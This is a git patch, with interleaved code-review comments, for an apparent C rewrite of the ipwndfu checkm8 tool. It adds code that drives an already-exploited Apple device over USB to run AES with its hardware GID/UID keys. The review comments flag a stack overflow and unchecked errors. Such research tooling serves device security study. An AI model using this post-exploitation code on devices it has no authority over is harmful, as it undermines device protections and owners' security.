From a65945db09278052f1b9278ac5b78463b4e68ce9 Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Fri, 8 Nov 2019 18:43:23 -0500 Subject: [PATCH] implemented aes (sort of), might reintroduce libusb? --- .gitmodules | 3 ++ CMakeLists.txt | 2 +- exploit/checkm8.h | 8 +++ exploit/commands.c | 69 ++++++++++++++++++++++++ exploit/{exploit_helpers.c => exploit.c} | 2 - libusb | 1 + main.c | 14 +++-- 7 files changed, 93 insertions(+), 6 deletions(-) create mode 100644 .gitmodules create mode 100644 exploit/commands.c rename exploit/{exploit_helpers.c => exploit.c} (97%) create mode 160000 libusb diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000..27465c7 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "libusb"] + path = libusb + url = https://github.com/libusb/libusb diff --git a/CMakeLists.txt b/CMakeLists.txt index 8d66ffd..029e34f 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -6,5 +6,5 @@ set(CMAKE_C_FLAGS -g) add_executable(ipwndfu main.c exploit/libusb_helpers.c exploit/libusb_helpers.h - exploit/exploit_helpers.c exploit/checkm8.h) + exploit/exploit.c exploit/checkm8.h exploit/commands.c) target_link_libraries(ipwndfu usb-1.0) diff --git a/exploit/checkm8.h b/exploit/checkm8.h index 7377c12..8b390af 100644 --- a/exploit/checkm8.h +++ b/exploit/checkm8.h @@ -3,4 +3,12 @@ int exploit_device(); +#define AES_ENCRYPT 16 +#define AES_DECRYPT 17 + +#define AES_GID_KEY 0x2000200 +#define AES_UID_KEY 0x2000201 + +int aes(unsigned char *source, unsigned char *target, int encrypt, int key); + #endif //IPWNDFU_REWRITE_C_CHECKM8_H diff --git a/exploit/commands.c b/exploit/commands.c new file mode 100644 index 0000000..e0bbb63 --- /dev/null +++ b/exploit/commands.c 
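Review bot: The new `aes` prototype in checkm8.h carries no size contract for `source`/`target` and nothing says which values `encrypt` and `key` accept; the reader has to open commands.c to learn that exactly 16 bytes are copied in and out and that the defines just above are the only valid arguments. I would put that on the declaration, e.g. `/* Runs one 16-byte block through the device AES engine: source and target are 16 bytes each, encrypt is AES_ENCRYPT or AES_DECRYPT, key is AES_GID_KEY or AES_UID_KEY; returns the value of the underlying command. */`, and make the input pointer `const unsigned char *source` since the implementation only reads it. A sentence noting that the hardware-key selectors are only meaningful after `exploit_device()` succeeded would also help, if that is the intended precondition — it is implied by main.c but not stated.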
@@ -0,0 +1,69 @@
+#include
+
+#include "libusb_helpers.h"
+#include "checkm8.h"
+
+#define EXEC_MAGIC 0x6365786563657865
+#define DONE_MAGIC 0x656e6f64656e6f64
+#define MEMC_MAGIC 0x636d656d636d656d
+#define MEMS_MAGIC 0x736d656d736d656d
+
+int command(unsigned char *request_data, int request_len, unsigned char *response_buf, int response_len)
+{
+ libusb_context *usb_ctx = NULL;
+ struct libusb_device_bundle bundle;
+
+ libusb_init(&usb_ctx);
+ get_test_device(usb_ctx, &bundle);
+
+ unsigned char nullbuf[16];
+ memset(nullbuf, '\0', 16);
+
+ libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 16, 5000);
+ libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 0, 100);
+ libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
+ libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
+ libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, request_data, request_len, 5000);
+
+ if(response_len == 0)
+ {
+ libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, 1, 5000);
+ return 0;
+ }
+ else
+ {
+ libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, request_len, 5000);
+ return 0;
+ }
+}
+
+
+int execute(unsigned long *args, int nargs, unsigned char *response_buf, int response_len)
+{
+ unsigned long cmd_buf[nargs + 1];
+ cmd_buf[0] = EXEC_MAGIC;
+ memcpy(&cmd_buf[1], args, 8 * nargs);
+
+ return command((unsigned char *) cmd_buf, 8 * (nargs + 1), response_buf, response_len);
+}
+
+
+int aes(unsigned char *source, unsigned char *target, int encrypt, int key)
+{
+ unsigned long args[10];
+ args[0] = 0x10000C8F4; // AES crypto command
+ args[1] = encrypt;
+ args[2] = 0x1800b0048; // cmd_data_address(7)
+ args[3] = 0x1800B0010; // cmd_data_address(0)
+ args[4] = 128; // length of the data
+ args[5] = key;
+ args[6] = 0;
+ args[7] = 0;
+ memcpy(&args[8], source, 16);
+
+ unsigned char response[32];
+ int ret = execute(args, 10, response, 32);
+
+ memcpy(target, &response[16], 16);
+
return ret; +} diff --git a/exploit/exploit_helpers.c b/exploit/exploit.c similarity index 97% rename from exploit/exploit_helpers.c rename to exploit/exploit.c index 9a292c1..dcab96b 100644 --- a/exploit/exploit_helpers.c +++ b/exploit/exploit.c @@ -11,8 +11,6 @@ int complete_stage(int stage_function(struct libusb_device_bundle *bundle)) libusb_context *usb_ctx = NULL; struct libusb_device_bundle usb_bundle; - struct libusb_device_handle *usb_handle; - struct libusb_device_descriptor usb_desc; libusb_init(&usb_ctx); get_test_device(usb_ctx, &usb_bundle); diff --git a/libusb b/libusb new file mode 160000 index 0000000..4bf9c34 --- /dev/null +++ b/libusb @@ -0,0 +1 @@ +Subproject commit 4bf9c343598900188a48e58408aa7e340f7caf87 diff --git a/main.c b/main.c index 6d346e8..29f07d2 100644 --- a/main.c +++ b/main.c @@ -4,12 +4,20 @@ int main() { int status = exploit_device(); - if(status == 0) + if(status != 0) { - printf("Successfully exploited device!\n"); + printf("Failed to exploit device\n"); + return status; } else { - printf("Failed to exploit device\n"); + unsigned char aes_in[16] = {0xDE, 0xAD, 0xBE, 0xEF, + 0xDE, 0xAD, 0xBE, 0xEF, + 0xDE, 0xAD, 0xBE, 0xEF, + 0xDE, 0xAD, 0xBE, 0xEF}; + unsigned char aes_out[16]; + + aes(aes_in, aes_out, AES_ENCRYPT, AES_UID_KEY); + printf("%s\n", aes_out); } } \ No newline at end of file
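Review bot: In `command`, the non-empty-response branch reads `request_len` bytes into `response_buf` rather than `response_len`, so the caller's buffer size is never honored; via `aes` that is a request of 8 * 11 = 88 bytes read back into the 32-byte `response` array on the stack, a plain stack overflow if the device answers with that much. The line should be `libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, response_len, 5000);`. Every `libusb_init`, `get_test_device` and `libusb_control_transfer` result is also discarded and both branches return a constant 0, so a missing device or a transfer that fails mid-sequence is reported as success and `aes` copies uninitialized `response` bytes into `target`; the context and handle opened on each call are never released either. `execute` hard-codes 8 as `sizeof(unsigned long)` (`8 * nargs`), which is true on the 64-bit hosts this is presumably built on but not in general — `uint64_t` args with `sizeof` would make the wire format explicit. The bare `#include` on the first line looks like a lost `<string.h>` (memset/memcpy are used); presumably an extraction artifact, but worth confirming in the repository.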
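Review bot: `printf("%s\n", aes_out)` in main.c treats 16 raw ciphertext bytes as a NUL-terminated string: it reads past the end of `aes_out` until it happens to hit a zero byte and prints non-printable bytes to the terminal. A hex dump is what is wanted here: `for (int i = 0; i < 16; i++) printf("%02x", aes_out[i]);` followed by `printf("\n");`. The return value of `aes(...)` is also ignored, so on a failed command the loop would print whatever was left in the buffer; checking it before printing would keep the output meaningful. The `main` function starts outside this hunk (its `int main()` line precedes the first hunk line).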